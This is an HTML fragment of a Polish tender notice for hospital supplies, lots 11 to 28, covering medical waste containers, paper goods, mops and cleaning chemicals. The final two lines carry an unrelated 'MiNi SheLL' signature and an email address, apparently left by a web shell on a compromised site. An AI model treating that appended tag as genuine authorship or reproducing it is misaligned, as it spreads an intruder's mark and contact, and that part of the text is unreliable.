<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu,datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 0,70 l - 9 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu,datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 0,25 l - 864 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Pojemnik medyczny jednorazowego użytku, plastikowy, pokrywa szczelnie zatrzaskiwana, brak możliwości ponownego otwarcia raz zamkniętego pojemnika. Na pojemniku widnieje etykieta zawierająca: piktogram którego wzór zamieszczony jest w załączniku nr 3 do Rozporządzenia Ministra Zdrowia z dnia 22.04.2005r., kod odpadu, miejsce pochodzenia odpadu, datę otwarcia i zamknięcia pojemnika oraz podpis osoby zamykającej pojemnik - poj. 2,5 - 5 l i dł. 35-40 cm. - na igły punkcyjne /mogą być poziome/	 - 2 100 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Pakiet 14.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Papier toaletowy w rolce, gramatura 38-40g/m2, gofrowany, perforowany, minimalna długość 30m, szerokość wstęgi 9.5cm -10cm - 70 000 szt.
<br/>2. Ręcznik papierowy listki, składany w ZZ, wymiar listka 25cm x 23cm, ( 1 op. = 200 listków), utwardzany w celu podniesienia wytrzymałości w stanie mokrym, gofrowany. Ręcznik zapewnia osuszenie rąk za pomocą 1- 2 listków - 80 000 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Pakiet 15.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Wózek sprzątacza - chromowany / dwa wiadra, wyciskarka, koszyk/ - 10 szt.
<br/>2. Stelaż do wózka - 40 cm /na mop z kieszenią/ - 50 szt.
<br/>3. Kij do stelaża - 20 szt.
<br/>4. Wyciskarka do wózka sprzątacza - 2 szt.
<br/>5. Mop /zmywak/ - 50 cm z zaczepem - 20 szt.
<br/>6. Mop /zmywak/ - 50 cm z kieszenią - 34 szt.
<br/>7. Mop mały wkręcany - 50 szt.
<br/>8. Wyciskarka plastikowa, prostokątna na wiadro - 15 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Pakiet 16.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Mop /zmywak/ - płaski pętelkowo-frędzelkowy, bawełniany z kieszenią 40 cm. Temperatura prania 95oC. Kodowane kolorystycznie /kolor wg. zamówienia niebieski, czerwony, żółty/ - 2 000 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Pakiet 17.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Stelaż do mycia okien i ścian - 35 cm - 10 szt.
<br/>2. Kij do stelaża do mycia okien i ścian - 10 szt.
<br/>3. Sztyca teleskopowa 2 x 100 cm.	- 2 szt.
<br/>4. Złączka łamana do sztycy - 1 szt.
<br/>5. Wkład zmywaka do okien futerkowy zapinany na rzep - 35 cm - 25 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> pakiet 18.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Szorowarka ręczna /do pracy z kijem/ - 10 szt.
<br/>2. Kij do szorowarki - 10 szt.
<br/>3. Pad prostokątny do szorowarki - 25 x 12 cm czarny lub brązowy - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> pakiet 19.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Ściągaczka z gumą do szyb - 25 cm - 2 szt.
<br/>2. Ściągaczka z gumą do szyb - 35 cm - 10 szt.
<br/>3. Kij do ściągaczki do szyb - 12 szt.
<br/>4. Guma do ściągaczki - 30 mb..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Pakiet 20.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Skrobaczka do szyb z rączką - dł ostrza 10 cm - 10 szt.
<br/>2. Ostrza do skrobaczki dł 10 cm - 30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Pakiet 21.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jednorazowe prześcieradło papierowe w rolce szer. 60cm dł 80 m - dwuwarstwowe, gofrowane - 300 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Pakiet 22.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jednorazowe prześcieradło papierowe w rolce szer. 40cm dł 80 m - dwuwarstwowe, gofrowane - 150 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Pakiet 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jednorazowe prześcieradło papierowo-foliowe w rolce szer. 60 cm. dł 1m - 61 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Pakiet 24.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Rolka papierowa szer. 40 cm. Na fotel ginekologiczny /firmy Famed-Żywiec typ. FG 04.0/N-144/02/ - 80 rolek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Pakiet 25.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Jednorazowy higieniczny podkład ochronny /dwuwarstwowy, papierowo-foliowy/ dł. 48 cm, szer. 33 cm - opakowanie 80 podkładów - 15 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 26 <b>NAZWA:</b> Pakiet 26.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Płyn do kąpieli lub mydło w płynie do mycia noworodków i wcześniaków hypoalergiczne, o słabo zaznaczonym zapachu, nie podrażniające skóry, nie zawierające barwników, posiadające dobre właściwości myjące, nawilżające o ph 5,5 - op. 400 - 600 ml. z dozownikiem. Na etykiecie musi być napis: dla dzieci - 750 litrów
<br/>2. Szampon dla dzieci - o słabo zaznaczonym zapachu, nie podrażnia skóry, nie zawiera barwników, posiada dobre właściwości myjące,  - na etykiecie musi być napis: dla dzieci - op.200-300 ml. - 15 litrów
<br/>3. Oliwka dla dzieci - o słabo zaznaczonym zapachu, nie podrażnia skóry, nie zawiera barwników  - na etykiecie musi być napis: dla dzieci - op.200-300 ml. - 30	litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 27 <b>NAZWA:</b> Pakiet 27.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Emulsja do pielęgnacji  rąk (po higienicznej i chirurgicznej dezynfekcji rąk) o działaniu nawilżającym i ochronnym, zawierająca witaminę  E,  przeznaczona do pielęgnacji rąk o działaniu regeneracyjnym. Przeznaczona dla osób o suchej, wrażliwej, lekko już uszkodzonej skórze.
Produkt powinien posiadać potwierdzoną skuteczność swoich właściwości pielęgnacyjnych w testach.
Emulsja musi być przebadana, przetestowana dermatologicznie oraz klinicznie - op. 0,5 l. Wykonawca zobowiązany jest dostarczyć pompki dozujące do każdego opakowania wliczone w cenę preparatu - 300 litrów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 28 <b>NAZWA:</b> Pakiet 28.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> <br/>1. Mydło w płynie /ph 5.5/- dobre właściwości myjące,nie wchodzi w reakcjez twardą wodą,nie wytrącają się sole wapnia,musi dobrze się spłukiwać -op. 5 l - 10 000 litrów
<br/>2. Pasta BHP - bez środka ściernego, zmiękczająca i nawilżająca skórę rąk, neutralne ph, ulegająca biodegradacji - op. do 500 g. - 100 kg
<br/>3. Krem do rąk w tubie do 100 g. nie powodujący podrażnień i objawów ściągania skóry, dobrze się wchłaniający powodujący optymalne nawilżenie skóry, o odpowiedniej konsystencji ułatwiającej dozowanie i rozprowadzanie kremu na skórze. zawartość kremu w opakowaniu musi być zgodna w stosunku do deklaracji producenta - 60 kg
<br/>4. Krem do golenia w tubie - do 100 g - przeznaczony do skóry wraźliwej, nie wysusza, hypoalergiczny - 20 kg
<br/>5. Środek do czyszczenia boazerii - op. 500 - 1000 ml - 12 litrów
<br/>6. Środek do czyszczenia mebli  i konserwacji mebli - usuwa kurz i nadaje  połysk meblom drewnianym i fornirowanym naturalnymi okleinami /spray/ - op. 250 - 300 ml - 102 litry
<br/>7. Żel do WC myjąco - dezynfekujący typu Domestos tj. o właściwościach wybielających, zawierający podchloryn sodu, o cytrynowym zapachu, łatwo się spłukuje - op. 750 ml - 1000 ml. - 8 000 litrów
<br/>8. Środek do usuwania kamienia, rdzy i zacieków bezpieczny dla stali nierdzewnej i chromu (do urządzeń sanitarnych) - op. do 500 ml - 250 litrów
<br/>9. Mleczko do czyszczenia - do powierzchni emaliowanych i ceramicznych, czyści bez zarysowań, nie pozostawia osadu - op. 500 - 750 g - 6 000 kg
<br/>10. Środek w atomizerze do czyszczenia stali nierdzewnej i chromowanej, elementów dekoracyjnych nie pozostawia smug i zarysowań oraz tłustej powierzchni op. 250-300 ml - 90 litrów
<br/>11.	Uniwersalny koncentrat do mycia powierzchni wodoodpornych o długotrwałym zapachu, nie wymaga spłukiwania - op. 1000 ml. - 90 000 litrów rob.
<br/>12. Koncentrat do prania wykładzin dywanowych i mebli tapicerowanych - koncentrat do prania maszynowego i ręcznego bez wybielaczy optycznych i rozpuszczalników - 6 000 litrów rob.
<br/>13. Uniwersalny środek do usuwania plam z wykładzin dywanowych z atomizerem - 10 litrów
<br/>14. Pasta ekologiczna do podłóg z tworzyw sztucznych, samopołyskowa, wodoodporna, antypoślizgowa op. do 500 g - 500 kg
<br/>15. Środek do udrażniania syfonów i rur kanalizacyjnych - op. do 500 g - 100 kg
<br/>16. Odświeżacz powietrza / spray / neutralizujący nieprzyjemne zapachy, do stosowania w toaletach - op. 300 ml - 400 ml. - 36 litrów
<br/>17. Płyn do naczyń, ulegający biodegradacji - op. 5 l. koncentrat minimum 1:1000 - 2 000 litrów
<br/>18. Płyn do naczyń, ulegający biodegradacji - op. od 750 ml do 1 l. koncentrat minimum 1:1000 - 3 000 litrów
<br/>19. Sól do zmywarek w granulkach /bez nabłyszczacza/ - op. 1,5 kg - 66 kg
<br/>20. Środek do mycia w zmywarkach /niskopieniący z dozownikami/ - 600 litrów
<br/>21. Nabłyszczacz do naczyń /do zmywarki/ z dozownikami - 120 litrów
<br/>22. Płyn do mycia szyb i luster - do stosowania w niskich temperaturach tj. do -150 C, nadaje szybom połysk /spryskiwacz/ - op. do 500 ml z atomizerem - 50 litrów
<br/>23. Płyn do mycia szyb i luster, nadaje szybom połysk /spryskiwacz/ - op. do 500 ml z atomizerem - 300 litrów
<br/>24.	Płyn do mycia szyb i luster, nadaje szybom połysk /wkład/ - op. do 500 ml - wkład musi być tego samego producenta co spryskiwacz zaoferowany w pozycji 24 - 900 litrów
<br/>25. Środek polimerowy do nabłyszczania podłóg z plastiduru, PCV, linoleum, samopołyskowy - opakowanie 5l. 1 litr środka musi zabezpieczać powierzchnię 50-60 m2 - 2 000 litrów
<br/>26. Niskopieniący środek do codziennego mycia podłóg z plastiduru i PCV pokrytych i niepokrytych środkiem polimerowym, antystatyczny, antypoślizgowy /do stosowania w automatycznych urządzeniach myjących / z pompką dozującą nakładaną na pojemnik z w/w środkiem. Opakowanie 10l. - 170 000 litrów rob.
<br/>27.	Środek myjący do podłóg z plastiduru i PCV, linoleum i podobnych pokrytych i niepokrytych środkiem polimerowym, antystatyczny, antypoślizgowy, zmywa tłusty brud / do mycia ręcznego / - op. 10 l. - 350 000 litrów rob.
<br/>28. Środek myjący do podłóg z plastiduru i PCV, linoleum i podobnych pokrytych i niepokrytych środkiem polimerowym, antystatyczny, antypoślizgowy, zmywa tłusty brud / do mycia ręcznego / - op. 1 l. - 150 000 litr rob.
<br/>29. Środek do gruntownego mycia podłóg. Środek musi przed ponownym nałożeniem nowej powłoki zdzierać stare powłoki polimerowe również innych producentów - 20 000 litrów rob.
<br/>30. Niskopieniący środek codziennego mycia podłóg z marmuru  do stosowania w automatycznych urządzeniach myjących z pompką dozującą nakładaną na  pojemnik z w/w środkiem / - 28 000 litrów rob.
<br/>31. Tabletki do zmywarki 5 w 1 Calgonit - op. 60 tabl. - 6 op.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.83.12.00-8, 39.22.43.00-1, 33.76.00.00-5, 33.16.94.00-6, 39.51.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Ocena jakości - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com